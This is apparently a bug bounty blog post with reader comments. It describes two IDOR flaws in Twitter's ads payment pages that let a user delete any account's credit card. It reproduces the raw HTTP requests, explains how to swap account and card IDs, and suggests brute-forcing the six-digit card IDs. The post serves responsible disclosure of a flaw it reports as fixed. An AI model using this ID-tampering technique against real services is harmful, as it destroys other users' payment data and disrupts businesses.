Hello everyone
today i will write about a serious vulnerability i’ve found recently in Twitter.
so let me share the story with you .
the story started when i saw Twitter introducing their new bug bounty program and starts paying monetary rewards , i decided to look for new bugs in Twitter and get paid.
at the first moment of hunting i’ve successfully found a csrf vulnerability that can add many followers in single request and bypass the csrf token protection but unfortunately it was duplicate issue .
i started looking again for some more critical bugs and i successfully found a serious logical vulnerability [insecure direct object reference] in ads.twitter.com that allowed me deleting credit cards from any Twitter account.
the impact of the vulnerability was very critical and high because all what’s needed to delete credit card is to have the credit card identifier which consists only of 6 numbers such as “220152”.
so imagine a blackhat hacker that could write a simple python code and use a simple for loop on 6 numbers he could delete all credit cards from all twitter accounts which will result in halting all the twitter ads campaigns and incur big financial loss for Twitter .
so what was the vulnerability and where it exists ?
Actually i found two vulnerabilities not one but both was having the same effect and impact.
#First Vulnerability
the first vulnerability i had spotted was in the delete functionality of credit cards in payments method page
https://ads.twitter.com/accounts/[account id]/payment_methods
when i choose to delete credit card and press on the delete button
an ajax POST request is sent to the server like the following:
POST /accounts/18ce53wqoxd/payment_methods/destroy HTTP/1.1
Host: ads.twitter.com
Connection: keep-alive
Content-Length: 29
Accept: /
Origin: https://ads.twitter.com
X-CSRF-Token: Lb6HONDceN5mGvAEUvCQNakJUspD60Odumz/trVdQfE=
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://ads.twitter.com/accounts/18ce53wqoxd/payment_methods
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Cookie: [cookies here]
account=18ce53wqoxd&id=219643
there is only two post parameters sent in request body .
account: the twitter account id
id: the credit card id and it’s numerical without any alphabetic characters
all i had to do is to change those two parameters to my other twitter account id and credit card id , then reply again the request and i suddenly found that credit card have been delete from the other twitter account without any required interaction .
the funny part that the page response was “403 forbbiden” but the credit card was actually deleted from the account
#Second Vulnerability
i’ve found another similar vulnerability but this time the impact was higher than the previous one.
when i tried to add an invalid credit card to my twitter account it displayed an error message
“we were unable to approve the card you entered” and show a button called “Dismiss”
when i pressed on the Dismiss button the credit card was disappeared from my account , so i thought it have the same effect of deleteing , so i tried to add invalid credit card again and intercepted the request which looks like the following :
POST /accounts/18ce53wqoxd/payment_methods/handle_failed/220152 HTTP/1.1
Host: ads.twitter.com
Connection: keep-alive
Content-Length: 108
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: https://ads.twitter.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://ads.twitter.com/accounts/18ce53wqoxd/payment_methods
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Cookie: [Cookies Here]
utf8=%E2%9C%93&authenticity_token=Lb6HONDceN5mGvAEUvCQNakJUspD60Odumz%2FtrVdQfE%3D&id=220152&dismiss=Dismiss
this time account parameter doesn’t exists and only credit card id is used .
so i changed the id in the url and body to my credit card id from other twitter account then replied the request , and guess what ?
credit card got deleted from the other twitter account 
for more info you can check the following video demonstration for the vulnerability
Twitter triaged and fixed the vulnerability within 2 days and i got the highest reward in Twitter bug bounty program till now
That’s very impressive!
Such a bug is affecting Twitter’s business model directly
Nice catch bro
Thanks my dear friend :))
Good Job bro
Thanks bro
Great
Keep Going I LIKE IT 
7abeby ya Fouad , glad that you liked it
keep going wish you the best
Thanks ya Nasoof
, i miss you bro
Great job


I only can say ……. wooooooooow
You are the boss
Thanks my dear friend
Nice one man , Hope they paid well :DD
Keep it up
Thanks alot ya Faris
, yes they paid a nice bounty 
Wow, Nice Catch brother, keep it up.
(2800$ = montage safa haha
)
Nice finding bro
Congrats and keep it up
Great Job bro
Happy hunting 
That is one heck of a vulnerability you found Ahmed Habibi
keep it up!
3almey Tool 3omrk Ya Abo Elaa
as i told you @ twitter (You are awesome)
this is just Awesome , Dont have words to say . (Y) .
Good Job
Thanks for sharing, this is a fantastic blog.Really looking forward to read more. Keep writing.
As Salaamu Aleikum Ahmed
Kifak?
Okay, I am a 18 year old sensitive person.
I want to talk with you :'(.
You can contant me via mail or via my little secret but personal facebook profile: https://www.facebook.com/alio.riise
很不错,过来支持一下。
Awesome finding (Y) Thumbs up
great job